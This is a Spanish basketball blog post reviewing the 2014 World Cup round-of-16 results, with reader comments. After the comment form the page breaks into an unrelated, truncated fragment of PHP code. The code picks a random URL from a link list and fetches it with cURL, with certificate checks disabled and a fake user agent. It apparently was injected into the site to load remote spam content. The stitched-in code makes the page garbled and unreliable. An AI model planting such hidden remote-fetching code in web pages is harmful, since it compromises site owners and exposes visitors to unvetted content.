Mundobasket 2014: Top 8

08 de September de 2014 por TheDeerHunter

Sólo quedan 8 supervivientes. Repasamos brevemente qué es lo que ha acontecido en estos octavos de final del mundial.

USA 86 – México 63: Fácil victoria para los favoritos que se permitieron el lujo de sestear en el último cuarto. Plantaron su defensa habitual y acribillaron desde fuera los intentos zonales del rival. Kenneth Faried y Anthony Davis estuvieron perdidos pero despertó Stephen Curry con 6 triples. Buen partido de Cousins y, por supuesto, de Gustavo Ayón que demostró tener sitio en la NBA.

República Dominicana 61 – Eslovenia 71: Parecía que los eslovenos se iban a imponer fácilmente tras la primera parte pero los boricuas le echaron las últimas gotas de casta de la mano de James Feldeine y Jack Martínez y no se rindieron hasta casi el final. Francisco García se perdió toda la primera parte con problemas de faltas y Goran Dragic no apareció hasta el tercer cuarto. Los eslovenos pueden dar gracias a que el “hermano malo” emergiera en los últimos compases del partido.

valanciunas new zealandFrancia 69 – Croacia 64: ¡Vaya manera de complicarse la vida los vigentes campeones de Europa! Encajaron 30 puntos en el último cuarto cuando habían tenido todo a su favor. El excepcional partido de Bojan Bogdanovic estuvo a punto de mandar a la “bleu” para casa sin pasar por el difícil trago del enfrentamiento ante los españoles en cuartos. Por Francia partido correcto de Evan Fournier y Nico Batum. Un choque muy irregular en cuanto a calidad.

España 89 – Senegal 56: Comenzaron los locales con dudas ante el poderío físico de los africanos. En la segunda parte, sin embargo, estos claudicaron ante una defensa más centrada y los terribles contraataques lanzados por Ricky Rubio. Excepcional actuación del base, así como de los interiores NBA de “La roja”. Resurrección de Jose Calderón cuando todo indicaba a que estaba definitivamente defenestrado por Orenga. La victoria más abultada de España en este tipo de competición a estas alturas.

Nueva Zelanda 71 – Lituania 76: Tras un primer cuarto demoledor de los lituanos los “kiwi” se impusieron en los otros 3. Los primeros se limitaron a administrar la ventaja. Extraordinaria actuación de Jonas Valanciunas.

Turquía 65 – Australia 64: Dolorosa despedida de Australia en el último suspiro tras haber tenido el pase en su mano. Un triple de Emir Preldzic castigó cruelmente su nula capacidad de rematar a los turcos que estuvieron noqueados en varios tramos del choque. Se sabía que la falta de experiencia de los aussies podía ser un factor. Buen partido de Aaron Baynes, Cameron Bairstow y Matthew Dellavedova pero no fue suficiente. Omer Asik, sin embargo, estuvo flojo.

Serbia 90 – Grecia 72: Mal momento para estrenarse en la derrota. La defensa helena hizo aguas por todas partes y cuando se atascaron en ataque el partido se inclinó rápidamente del lado serbio. Buena actuación de Miroslav Raduljica y también de Nick Calathes, su mejor partido del campeonato. En cambio Giannis Antetokounmpo no estuvo a la altura.

Brasil 85 – Argentina 65: Disfrutamos de un cuarto sensacional por parte de los albicelestes con un Pablo Prigioni desatado pero nada más. Los argentinos terminaron apalizados por la mayor potencia de los cariocas. Muy bien la tríada de interiores NBA brasileiros y mal Luis Scola que le tocó sufrirlos. Todos los clasificados del grupo A pasan el corte.

Comenta

11 comentarios a esta entrada

  1. Alfredo dice:
    #1

    Y 4 de los 8 equipos que siguen vivos los del grupo A, de España. Quizá no haya sido tanto paseo hasta ahora y debamos reconocer el mérito de contar los partidos por victorias y además holgadas

      Citar

  2. Nacho dice:
    #2

    Alfredo:
    Y 4 de los 8 equipos que siguen vivos los del grupo A, de España. Quizá no haya sido tanto paseo hasta ahora y debamos reconocer el mérito de contar los partidos por victorias y además holgadas

    Hombre mérito tienen y mucho. Han ganado, además, a pesar de su entrenador. Pero es que son un equipazo. Al cinco titular, para ser ya leyenda, le sobran algunas lesiones de Navarro y unos diez centímetros a Rudy.
    Lo de Ricky es de escándalo, espero que este nivel lo mantenga en los Wolves, donde ha sido más irregular. Pero bien es cierto que no ha habido rival de campanillas. A día de hoy, en el baloncesto FIBA no lo existe. Ni una Francia con todos sus efectivos estaría a la altura (cierto que podrían ganarnos y esas cosas, pero serían las menos de las veces)

    Al equipo, evidentemente, le falta una dirección técnica. Aunque no fuese muy buena, ya haría más que ahora. Un poco de implicación de la segunda unidad, alguien que les haga sentirse importantes.

      Citar

  3. Denise dice:
    #3

    A ver si entra Fournier y se hincha a meter triples hombre..que pena no ver a Francia con parker, noah, mahinmi, seraphin, o ajinca, asi el partido seria igualado.

      Citar

  4. Denise dice:
    #4

    El arbitraje me esta pareciendo lamentable a favor de España. Se nota que FIBA busca a toda costa la final con USA.

      Citar

  5. Denise dice:
    #5

    Estoy flipando con mi querido Rudy Gobert. Vaya coloso bajo aros. 21 años y en buena medida por ahora secando a todo un trio Pau-ibaka-Marc

      Citar

  6. Denise dice:
    #6

    Jojo vaya fracaso monumental de españa. Los ke criticabais a orenga teniais razon, yo no lo veia venir y pensaba ke solo eeuu podia ganar a españa incluso daba a estos como favoritos. Por la otra parte, grande francia, un ekipo que siempre me ha gustado,con ese mitico y crack coach canijo y ahora mas con jugadores que me encantan como batum, gobert o diaw

      Citar

  7. Azabel dice:
    #7

    disculpenme españoles pero JAJAJAJAJAJAJAJAJAJAJAJAJA JAJAJAJAJAJAJAJAJAJAJAJAJA JAJAJAJAJAJAJAJAJ
    Es mas fuerte que yo!!!

    (cambio de nombre para estar a tono con los demas, ex esteban)

      Citar

  8. Azabel dice:
    #8

    Alfredo:
    Y 4 de los 8 equipos que siguen vivos los del grupo A, de España. Quizá no haya sido tanto paseo hasta ahora y debamos reconocer el mérito de contar los partidos por victorias y además holgadas

    mas que pedir paseo, deberian agradecer que llegaron a cuartos, mas lejos q mi Argentina je

      Citar

  9. Azabel dice:
    #9

    Disculpen por las burlas, hay mucha envidia del equipo de españa q su fracaso genera regocijo

      Citar

  10. Junior dice:
    #10

    “Parecía que los eslovenos se iban a imponer fácilmente tras la primera parte pero los boricuas le echaron las últimas gotas de casta de la mano de James Feldeine y Jack Martínez”

    Valga la corrección, los boricuas son de PUERTO RICO no DOMINICANOS.

      Citar

  11. TheDeerHunter dice:
    #11

    Gracias por la corrección y perdón por la confusión.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>